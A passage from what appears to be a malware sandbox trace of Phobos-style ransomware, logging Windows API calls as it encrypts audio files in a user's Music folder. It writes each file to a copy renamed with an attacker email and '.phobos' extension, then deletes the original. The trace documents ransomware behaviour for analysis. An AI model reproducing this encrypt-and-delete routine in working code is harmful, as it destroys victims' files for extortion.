h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\qam3exzbu1xqwk145.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\qAm3eXzbu1xQwk145.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\qam3exzbu1xqwk145.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.303] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.303] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\qAm3eXzbu1xQwk145.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\qam3exzbu1xqwk145.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.521] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0198.521] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.521] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x280f, lpOverlapped=0x0) returned 1 [0198.528] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2810, dwBufLen=0x2810 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2810) returned 1 [0198.528] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2810, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2810, lpOverlapped=0x0) returned 1 [0198.529] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0198.529] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.529] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.529] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.529] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.529] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.529] CloseHandle (hObject=0x174) returned 1 [0198.529] CloseHandle (hObject=0x140) returned 1 [0198.530] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\qAm3eXzbu1xQwk145.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\qam3exzbu1xqwk145.m4a")) returned 1 [0198.530] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\1OmrP8kZJ7T67ZZaD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\1omrp8kzj7t67zzad.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.537] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=64754) returned 1 [0198.537] CloseHandle (hObject=0x15c) returned 1 [0198.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\1OmrP8kZJ7T67ZZaD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\1omrp8kzj7t67zzad.mp3")) returned 0x20 [0198.538] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\1OmrP8kZJ7T67ZZaD.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\1omrp8kzj7t67zzad.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\1OmrP8kZJ7T67ZZaD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\1omrp8kzj7t67zzad.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.538] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.538] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\1OmrP8kZJ7T67ZZaD.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\1omrp8kzj7t67zzad.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.539] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0198.539] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.539] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfcf2, lpOverlapped=0x0) returned 1 [0198.542] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfd00, dwBufLen=0xfd00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfd00) returned 1 [0198.543] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xfd00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xfd00, lpOverlapped=0x0) returned 1 [0198.544] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0198.544] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.544] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.544] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.544] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.545] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.545] CloseHandle (hObject=0x15c) returned 1 [0198.545] CloseHandle (hObject=0x118) returned 1 [0198.545] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\1OmrP8kZJ7T67ZZaD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\1omrp8kzj7t67zzad.mp3")) returned 1 [0198.546] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\OCug6Z1dr79ot.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\ocug6z1dr79ot.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.547] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=52986) returned 1 [0198.547] CloseHandle (hObject=0x118) returned 1 [0198.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\OCug6Z1dr79ot.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\ocug6z1dr79ot.mp3")) returned 0x20 [0198.547] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\OCug6Z1dr79ot.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\ocug6z1dr79ot.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\OCug6Z1dr79ot.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\ocug6z1dr79ot.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.547] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.547] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\OCug6Z1dr79ot.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\ocug6z1dr79ot.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.548] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0198.548] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.548] ReadFile (in: hFile=0x118, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcefa, lpOverlapped=0x0) returned 1 [0198.549] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xcf00, dwBufLen=0xcf00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xcf00) returned 1 [0198.549] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xcf00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xcf00, lpOverlapped=0x0) returned 1 [0198.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0198.551] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.551] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.551] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.551] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.551] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.551] CloseHandle (hObject=0x118) returned 1 [0198.551] CloseHandle (hObject=0x15c) returned 1 [0198.551] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\OCug6Z1dr79ot.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\ocug6z1dr79ot.mp3")) returned 1 [0198.552] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\RkLQ06vZ6rZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\rklq06vz6rz.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.553] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=68132) returned 1 [0198.553] CloseHandle (hObject=0x15c) returned 1 [0198.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\RkLQ06vZ6rZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\rklq06vz6rz.m4a")) returned 0x20 [0198.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\RkLQ06vZ6rZ.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\rklq06vz6rz.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\RkLQ06vZ6rZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\rklq06vz6rz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.554] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.554] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\RkLQ06vZ6rZ.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\rklq06vz6rz.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0198.554] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.554] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10a24, lpOverlapped=0x0) returned 1 [0198.556] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10a30, dwBufLen=0x10a30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10a30) returned 1 [0198.556] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10a30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10a30, lpOverlapped=0x0) returned 1 [0198.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0198.557] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.558] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.558] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.558] WriteFile (in: hFile=0x118, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.558] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.558] CloseHandle (hObject=0x15c) returned 1 [0198.558] CloseHandle (hObject=0x118) returned 1 [0198.558] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\RkLQ06vZ6rZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\rklq06vz6rz.m4a")) returned 1 [0198.559] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\vqfSimOlRiKKnw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\vqfsimolrikknw.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.560] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3887) returned 1 [0198.560] CloseHandle (hObject=0x118) returned 1 [0198.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\vqfSimOlRiKKnw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\vqfsimolrikknw.m4a")) returned 0x20 [0198.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\vqfSimOlRiKKnw.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\vqfsimolrikknw.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\vqfSimOlRiKKnw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\vqfsimolrikknw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.560] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.560] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\OaHo4q4b\\vqfSimOlRiKKnw.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\oaho4q4b\\vqfsimolrikknw.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.561] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0198.561] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.561] ReadFile (in: hFile=0x118, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf2f, lpOverlapped=0x0) returned 1 [0198.562] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf30, dwBufLen=0xf30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf30) returned 1 [0198.562] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf30, lpOverlapped=0x0) returned 1 [0198.563] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0198.563] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.563] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.563] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.563] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.563] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.563] CloseHandle (hObject=0x118) returned 1 [0198.563] CloseHandle (hObject=0x15c) returned 1 [0198.563] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC 